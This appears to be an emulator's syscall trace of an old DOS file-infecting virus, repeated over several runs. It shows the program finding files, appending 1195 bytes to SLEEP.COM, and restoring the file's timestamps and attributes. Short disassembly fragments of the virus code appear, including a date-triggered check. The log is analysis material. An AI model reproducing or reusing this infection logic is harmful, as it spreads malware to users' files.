2018-12-25T11:48:40.924772897Z 62 PC: 12cbc | Close file
2018-12-25T11:48:40.927836093Z 61 PC: 12cc1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:40.935283137Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:48:40.939170118Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:40.943568122Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:40.947514287Z 66 PC: 12d04 | Move file pointer
2018-12-25T11:48:40.951484264Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-25T11:48:40.962072473Z 87 PC: 12d1d | Get or set file date and time
2018-12-25T11:48:40.964278799Z 62 PC: 12d21 | Close file
2018-12-25T11:48:40.974094937Z 67 PC: 12d32 | Get or set file attributes
2018-12-25T11:48:40.986258247Z 79 PC: 12c0c | Find next file
2018-12-25T11:48:40.989880719Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:40.997539528Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:41.005338469Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:41.007807598Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:41.018563394Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:41.021314293Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:41.028558839Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:41.031624273Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:41.035312086Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:41.039102315Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:41.041220747Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:41.051883034Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:41.053561562Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:41.061976116Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:41.073693853Z 79 PC: 12c0c | Find next file (See above)
2018-12-25T11:48:41.076929088Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:41.084334049Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:41.092367839Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:41.095430156Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:41.106992131Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:41.109259209Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:41.117757635Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:41.121046949Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:41.123918475Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:41.127620909Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:41.129737212Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:41.153654308Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:41.156074521Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:41.161619956Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:41.168660063Z 42 PC: 12b53 | Get date 0x12b53: cmp dx, 0x606
0x12b57: je 0x12b5c
0x12b59: jmp 0x12da2
0x12b5c: jmp 0x12d37
0x12b5f: and ah, bh
0x12b61: movsw word ptr es:[di], word ptr [si]
0x12b62: mov ax, 0x5c4c
0x12b65: add word ptr [di], ax
0x12b67: add byte ptr [di - 0x75], dl
0x12b6a: in al, dx
0x12b6b: sub sp, 0x2c
0x12b6e: push si
0x12b6f: jmp 0x12be0
0x12b71: mov ah, 0x1a
0x12b73: lea dx, word ptr [bp - 0x2c]
0x12b76: int 0x21
0x12b78: mov ah, 0x4e
0x12b7a: mov cx, 0x10
0x12b7d: mov dx, 0x1a2
0x12b80: add dx, word ptr [0x106]
2018-12-25T11:48:41.170355287Z 59 PC: 12dad | Change current directory
2018-12-25T11:48:41.173072246Z 59 PC: 12db4 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":3146,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:40.889294413Z 71 PC: 12b2d | Get current directory
2018-12-25T11:48:40.893419096Z 59 PC: 12b38 | Change current directory
2018-12-25T11:48:40.898231302Z 26 PC: 12beb | Set disk transfer address
2018-12-25T11:48:40.899609573Z 78 PC: 12bf9 | Find first file
2018-12-25T11:48:40.906514439Z 61 PC: 12c24 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:40.911224946Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T11:48:40.91811595Z 44 PC: 12c9e | Get time 0x12c9e: add dl, dh
0x12ca0: je 0x12c9a
0x12ca2: mov si, 0x115
0x12ca5: add si, word ptr [0x106]
0x12ca9: mov byte ptr [si], dl
0x12cab: mov ax, 0x4301
0x12cae: xor cx, cx
0x12cb0: mov dx, si
0x12cb2: add dx, 0xb4
0x12cb6: int 0x21
0x12cb8: mov ah, 0x3e
0x12cba: int 0x21
0x12cbc: mov ax, 0x3d02
0x12cbf: int 0x21
0x12cc1: jb 0x12c45
0x12cc3: mov di, dx
0x12cc5: add di, 0x5d
0x12cc8: stosw word ptr es:[di], ax
0x12cc9: xchg ax, bx
0x12cca: mov ah, 0x40
2018-12-25T11:48:40.920392516Z 67 PC: 12cb8 | Get or set file attributes
2018-12-25T11:48:40.942548091Z 62 PC: 12cbc | Close file
2018-12-25T11:48:40.944618041Z 61 PC: 12cc1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:40.952190853Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:48:40.960653653Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:40.963670265Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:40.966813545Z 66 PC: 12d04 | Move file pointer
2018-12-25T11:48:40.969633911Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-25T11:48:40.979829672Z 87 PC: 12d1d | Get or set file date and time
2018-12-25T11:48:40.981337829Z 62 PC: 12d21 | Close file
2018-12-25T11:48:40.991802433Z 67 PC: 12d32 | Get or set file attributes
2018-12-25T11:48:41.003628334Z 79 PC: 12c0c | Find next file
2018-12-25T11:48:41.007737401Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:41.015350625Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:41.023586131Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:41.026025804Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:41.037325249Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:41.040237067Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:41.04791273Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:41.051303065Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:41.055005948Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:41.057668612Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:41.059645799Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:41.070879119Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:41.073402996Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:41.082679776Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:41.094850491Z 79 PC: 12c0c | Find next file (See above)
2018-12-25T11:48:41.097754953Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:41.104574937Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:41.111988198Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:41.114166188Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:41.124522792Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:41.128086105Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:41.136241307Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:41.13916752Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:41.141929574Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:41.145530323Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:41.147493166Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:41.157043808Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:41.15893193Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:41.166713868Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:41.17721235Z 42 PC: 12b53 | Get date 0x12b53: cmp dx, 0x606
0x12b57: je 0x12b5c
0x12b59: jmp 0x12da2
0x12b5c: jmp 0x12d37
0x12b5f: and ah, bh
0x12b61: movsw word ptr es:[di], word ptr [si]
0x12b62: mov ax, 0x5c4c
0x12b65: add word ptr [di], ax
0x12b67: add byte ptr [di - 0x75], dl
0x12b6a: in al, dx
0x12b6b: sub sp, 0x2c
0x12b6e: push si
0x12b6f: jmp 0x12be0
0x12b71: mov ah, 0x1a
0x12b73: lea dx, word ptr [bp - 0x2c]
0x12b76: int 0x21
0x12b78: mov ah, 0x4e
0x12b7a: mov cx, 0x10
0x12b7d: mov dx, 0x1a2
0x12b80: add dx, word ptr [0x106]
2018-12-25T11:48:41.180477403Z 59 PC: 12dad | Change current directory
2018-12-25T11:48:41.18480884Z 59 PC: 12db4 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":3146,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:41.191246766Z 71 PC: 12b2d | Get current directory
2018-12-25T11:48:41.195335193Z 59 PC: 12b38 | Change current directory
2018-12-25T11:48:41.199603134Z 26 PC: 12beb | Set disk transfer address
2018-12-25T11:48:41.202465726Z 78 PC: 12bf9 | Find first file
2018-12-25T11:48:41.20963131Z 61 PC: 12c24 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:41.216407483Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T11:48:41.230871833Z 44 PC: 12c9e | Get time 0x12c9e: add dl, dh
0x12ca0: je 0x12c9a
0x12ca2: mov si, 0x115
0x12ca5: add si, word ptr [0x106]
0x12ca9: mov byte ptr [si], dl
0x12cab: mov ax, 0x4301
0x12cae: xor cx, cx
0x12cb0: mov dx, si
0x12cb2: add dx, 0xb4
0x12cb6: int 0x21
0x12cb8: mov ah, 0x3e
0x12cba: int 0x21
0x12cbc: mov ax, 0x3d02
0x12cbf: int 0x21
0x12cc1: jb 0x12c45
0x12cc3: mov di, dx
0x12cc5: add di, 0x5d
0x12cc8: stosw word ptr es:[di], ax
0x12cc9: xchg ax, bx
0x12cca: mov ah, 0x40
2018-12-25T11:48:41.233004901Z 67 PC: 12cb8 | Get or set file attributes
2018-12-25T11:48:41.250507714Z 62 PC: 12cbc | Close file
2018-12-25T11:48:41.254798564Z 61 PC: 12cc1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:41.261522117Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:48:41.265026221Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:41.269348452Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:41.272682618Z 66 PC: 12d04 | Move file pointer
2018-12-25T11:48:41.27786362Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-25T11:48:41.289676739Z 87 PC: 12d1d | Get or set file date and time
2018-12-25T11:48:41.291385217Z 62 PC: 12d21 | Close file
2018-12-25T11:48:41.301325148Z 67 PC: 12d32 | Get or set file attributes
2018-12-25T11:48:41.311713159Z 79 PC: 12c0c | Find next file
2018-12-25T11:48:41.31422212Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:41.321375085Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:41.32786175Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:41.329920934Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:41.340981941Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:41.343120003Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:41.350330974Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:41.35466812Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:41.373110661Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:41.375957659Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:41.378203739Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:41.387313138Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:41.388745452Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:41.396322514Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:41.42856618Z 79 PC: 12c0c | Find next file (See above)
2018-12-25T11:48:41.431915138Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:41.43865455Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:41.447955279Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:41.450046899Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:41.459943977Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:41.462962013Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:41.469894919Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:41.47316463Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:41.477429727Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:41.480004294Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:41.481758855Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:41.491869706Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:41.493469839Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:41.501078307Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:41.511614698Z 42 PC: 12b53 | Get date 0x12b53: cmp dx, 0x606
0x12b57: je 0x12b5c
0x12b59: jmp 0x12da2
0x12b5c: jmp 0x12d37
0x12b5f: and ah, bh
0x12b61: movsw word ptr es:[di], word ptr [si]
0x12b62: mov ax, 0x5c4c
0x12b65: add word ptr [di], ax
0x12b67: add byte ptr [di - 0x75], dl
0x12b6a: in al, dx
0x12b6b: sub sp, 0x2c
0x12b6e: push si
0x12b6f: jmp 0x12be0
0x12b71: mov ah, 0x1a
0x12b73: lea dx, word ptr [bp - 0x2c]
0x12b76: int 0x21
0x12b78: mov ah, 0x4e
0x12b7a: mov cx, 0x10
0x12b7d: mov dx, 0x1a2
0x12b80: add dx, word ptr [0x106]
2018-12-25T11:48:41.513889138Z 59 PC: 12dad | Change current directory
2018-12-25T11:48:41.517878219Z 59 PC: 12db4 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":3146,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:41.43641556Z 71 PC: 12b2d | Get current directory
2018-12-25T11:48:41.440308399Z 59 PC: 12b38 | Change current directory
2018-12-25T11:48:41.445856702Z 26 PC: 12beb | Set disk transfer address
2018-12-25T11:48:41.447362811Z 78 PC: 12bf9 | Find first file
2018-12-25T11:48:41.455801872Z 61 PC: 12c24 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:41.460548537Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T11:48:41.464816332Z 44 PC: 12c9e | Get time 0x12c9e: add dl, dh
0x12ca0: je 0x12c9a
0x12ca2: mov si, 0x115
0x12ca5: add si, word ptr [0x106]
0x12ca9: mov byte ptr [si], dl
0x12cab: mov ax, 0x4301
0x12cae: xor cx, cx
0x12cb0: mov dx, si
0x12cb2: add dx, 0xb4
0x12cb6: int 0x21
0x12cb8: mov ah, 0x3e
0x12cba: int 0x21
0x12cbc: mov ax, 0x3d02
0x12cbf: int 0x21
0x12cc1: jb 0x12c45
0x12cc3: mov di, dx
0x12cc5: add di, 0x5d
0x12cc8: stosw word ptr es:[di], ax
0x12cc9: xchg ax, bx
0x12cca: mov ah, 0x40
2018-12-25T11:48:41.466441579Z 67 PC: 12cb8 | Get or set file attributes
2018-12-25T11:48:41.481782073Z 62 PC: 12cbc | Close file
2018-12-25T11:48:41.484410472Z 61 PC: 12cc1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:41.497798222Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:48:41.507929432Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:41.51100344Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:41.513884462Z 66 PC: 12d04 | Move file pointer
2018-12-25T11:48:41.51633929Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-25T11:48:41.528197774Z 87 PC: 12d1d | Get or set file date and time
2018-12-25T11:48:41.529902403Z 62 PC: 12d21 | Close file
2018-12-25T11:48:41.538481851Z 67 PC: 12d32 | Get or set file attributes
2018-12-25T11:48:41.552825406Z 79 PC: 12c0c | Find next file
2018-12-25T11:48:41.556089098Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:41.564510912Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:41.572498252Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:41.574919686Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:41.58666348Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:41.589939613Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:41.597559474Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:41.600910144Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:41.604988419Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:41.608487221Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:41.610696809Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:41.622690874Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:41.625175774Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:41.634314674Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:41.645167457Z 79 PC: 12c0c | Find next file (See above)
2018-12-25T11:48:41.648194999Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:41.655387347Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:41.662504128Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:41.665070695Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:41.675947568Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:41.677785429Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:41.685857102Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:41.689082574Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:41.693229549Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:41.697135053Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:41.699704474Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:41.709876755Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:41.712258262Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:41.721244773Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:41.732157561Z 42 PC: 12b53 | Get date 0x12b53: cmp dx, 0x606
0x12b57: je 0x12b5c
0x12b59: jmp 0x12da2
0x12b5c: jmp 0x12d37
0x12b5f: and ah, bh
0x12b61: movsw word ptr es:[di], word ptr [si]
0x12b62: mov ax, 0x5c4c
0x12b65: add word ptr [di], ax
0x12b67: add byte ptr [di - 0x75], dl
0x12b6a: in al, dx
0x12b6b: sub sp, 0x2c
0x12b6e: push si
0x12b6f: jmp 0x12be0
0x12b71: mov ah, 0x1a
0x12b73: lea dx, word ptr [bp - 0x2c]
0x12b76: int 0x21
0x12b78: mov ah, 0x4e
0x12b7a: mov cx, 0x10
0x12b7d: mov dx, 0x1a2
0x12b80: add dx, word ptr [0x106]
2018-12-25T11:48:41.735161007Z 59 PC: 12dad | Change current directory
2018-12-25T11:48:41.739913139Z 59 PC: 12db4 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":3146,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:41.771721633Z 71 PC: 12b2d | Get current directory
2018-12-25T11:48:41.777589381Z 59 PC: 12b38 | Change current directory
2018-12-25T11:48:41.781848625Z 26 PC: 12beb | Set disk transfer address
2018-12-25T11:48:41.783190978Z 78 PC: 12bf9 | Find first file
2018-12-25T11:48:41.789514074Z 61 PC: 12c24 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:41.799813447Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T11:48:41.806452698Z 44 PC: 12c9e | Get time 0x12c9e: add dl, dh
0x12ca0: je 0x12c9a
0x12ca2: mov si, 0x115
0x12ca5: add si, word ptr [0x106]
0x12ca9: mov byte ptr [si], dl
0x12cab: mov ax, 0x4301
0x12cae: xor cx, cx
0x12cb0: mov dx, si
0x12cb2: add dx, 0xb4
0x12cb6: int 0x21
0x12cb8: mov ah, 0x3e
0x12cba: int 0x21
0x12cbc: mov ax, 0x3d02
0x12cbf: int 0x21
0x12cc1: jb 0x12c45
0x12cc3: mov di, dx
0x12cc5: add di, 0x5d
0x12cc8: stosw word ptr es:[di], ax
0x12cc9: xchg ax, bx
0x12cca: mov ah, 0x40
2018-12-25T11:48:41.808688316Z 67 PC: 12cb8 | Get or set file attributes
2018-12-25T11:48:41.828098573Z 62 PC: 12cbc | Close file
2018-12-25T11:48:41.830253302Z 61 PC: 12cc1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:41.837151311Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:48:41.844696885Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:41.858696422Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:41.862117148Z 66 PC: 12d04 | Move file pointer
2018-12-25T11:48:41.86507469Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-25T11:48:41.874555945Z 87 PC: 12d1d | Get or set file date and time
2018-12-25T11:48:41.876048772Z 62 PC: 12d21 | Close file
2018-12-25T11:48:41.884339119Z 67 PC: 12d32 | Get or set file attributes
2018-12-25T11:48:41.910682012Z 79 PC: 12c0c | Find next file
2018-12-25T11:48:41.914447779Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:41.921458179Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:41.930819067Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:41.932948069Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:41.942996251Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:41.94526881Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:41.951890219Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:41.954871297Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:41.958407553Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:41.961399544Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:41.963321002Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:41.97355736Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:41.975057435Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:41.982443374Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:42.004247386Z 79 PC: 12c0c | Find next file (See above)
2018-12-25T11:48:42.006769814Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:42.010956202Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:42.015729001Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:42.017291485Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:42.023613638Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:42.025460635Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:42.032450538Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:42.036977412Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:42.03942267Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:42.041273273Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:42.042650928Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:42.048639357Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:42.050064482Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:42.055326059Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:42.062186214Z 42 PC: 12b53 | Get date 0x12b53: cmp dx, 0x606
0x12b57: je 0x12b5c
0x12b59: jmp 0x12da2
0x12b5c: jmp 0x12d37
0x12b5f: and ah, bh
0x12b61: movsw word ptr es:[di], word ptr [si]
0x12b62: mov ax, 0x5c4c
0x12b65: add word ptr [di], ax
0x12b67: add byte ptr [di - 0x75], dl
0x12b6a: in al, dx
0x12b6b: sub sp, 0x2c
0x12b6e: push si
0x12b6f: jmp 0x12be0
0x12b71: mov ah, 0x1a
0x12b73: lea dx, word ptr [bp - 0x2c]
0x12b76: int 0x21
0x12b78: mov ah, 0x4e
0x12b7a: mov cx, 0x10
0x12b7d: mov dx, 0x1a2
0x12b80: add dx, word ptr [0x106]
2018-12-25T11:48:42.063793833Z 59 PC: 12dad | Change current directory
2018-12-25T11:48:42.066590337Z 59 PC: 12db4 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":3146,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:41.954821915Z 71 PC: 12b2d | Get current directory
2018-12-25T11:48:41.963123275Z 59 PC: 12b38 | Change current directory
2018-12-25T11:48:41.96738541Z 26 PC: 12beb | Set disk transfer address
2018-12-25T11:48:41.969177821Z 78 PC: 12bf9 | Find first file
2018-12-25T11:48:41.982942616Z 61 PC: 12c24 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:41.98925865Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T11:48:41.99538673Z 44 PC: 12c9e | Get time 0x12c9e: add dl, dh
0x12ca0: je 0x12c9a
0x12ca2: mov si, 0x115
0x12ca5: add si, word ptr [0x106]
0x12ca9: mov byte ptr [si], dl
0x12cab: mov ax, 0x4301
0x12cae: xor cx, cx
0x12cb0: mov dx, si
0x12cb2: add dx, 0xb4
0x12cb6: int 0x21
0x12cb8: mov ah, 0x3e
0x12cba: int 0x21
0x12cbc: mov ax, 0x3d02
0x12cbf: int 0x21
0x12cc1: jb 0x12c45
0x12cc3: mov di, dx
0x12cc5: add di, 0x5d
0x12cc8: stosw word ptr es:[di], ax
0x12cc9: xchg ax, bx
0x12cca: mov ah, 0x40
2018-12-25T11:48:41.997608345Z 67 PC: 12cb8 | Get or set file attributes
2018-12-25T11:48:42.033657935Z 62 PC: 12cbc | Close file
2018-12-25T11:48:42.035434263Z 61 PC: 12cc1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:42.042581917Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:48:42.045762143Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:42.048645019Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:42.051535903Z 66 PC: 12d04 | Move file pointer
2018-12-25T11:48:42.054608698Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-25T11:48:42.064196281Z 87 PC: 12d1d | Get or set file date and time
2018-12-25T11:48:42.065908083Z 62 PC: 12d21 | Close file
2018-12-25T11:48:42.074718877Z 67 PC: 12d32 | Get or set file attributes
2018-12-25T11:48:42.084601964Z 79 PC: 12c0c | Find next file
2018-12-25T11:48:42.087617855Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:42.09540337Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:42.102567422Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:42.105238494Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:42.113738377Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:42.115364078Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:42.120823665Z 64 PC: 12cd4 | Write file or device (See above)
